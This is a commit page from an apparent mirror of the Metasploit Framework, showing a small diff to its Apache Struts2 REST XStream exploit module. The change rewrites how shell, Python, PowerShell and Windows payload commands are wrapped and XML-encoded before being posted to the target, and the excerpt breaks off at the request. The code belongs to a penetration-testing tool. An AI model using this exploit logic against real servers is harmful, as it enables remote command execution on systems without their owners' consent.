infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Assign cmd to entire case and use encode for XML 

Hat tip @acammack-r7. Forgot about that first syntax!
bug/bundler_fix
William Vu 2017-09-07 19:08:37 -05:00
parent 8f1e353b6e
commit a9a307540f
1 changed files with 7 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/multi/http/struts2_rest_xstream.rb
View File

@ -86,21 +86,19 @@ class MetasploitModule < Msf::Exploit::Remote
# #
def execute_command(cmd, opts = {}) def execute_command(cmd, opts = {})
case target.name cmd = case target.name
when /Unix/, /Linux/ when /Unix/, /Linux/
cmd = %W{/bin/sh -c #{cmd}} %W{/bin/sh -c #{cmd}}
when /Python/ when /Python/
cmd = %W{python -c #{cmd}} %W{python -c #{cmd}}
when /PowerShell/ when /PowerShell/
# This shit doesn't work yet %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
require 'pry'; binding.pry
cmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
when /Windows/ when /Windows/
cmd = %W{cmd.exe /c #{cmd}} %W{cmd.exe /c #{cmd}}
end end
# Encode each command argument with HTML entities # Encode each command argument with XML entities
cmd.map! { |arg| Rex::Text.html_encode(arg) } cmd.map! { |arg| arg.encode(xml: :text) }
res = send_request_cgi( res = send_request_cgi(
'method' => 'POST', 'method' => 'POST',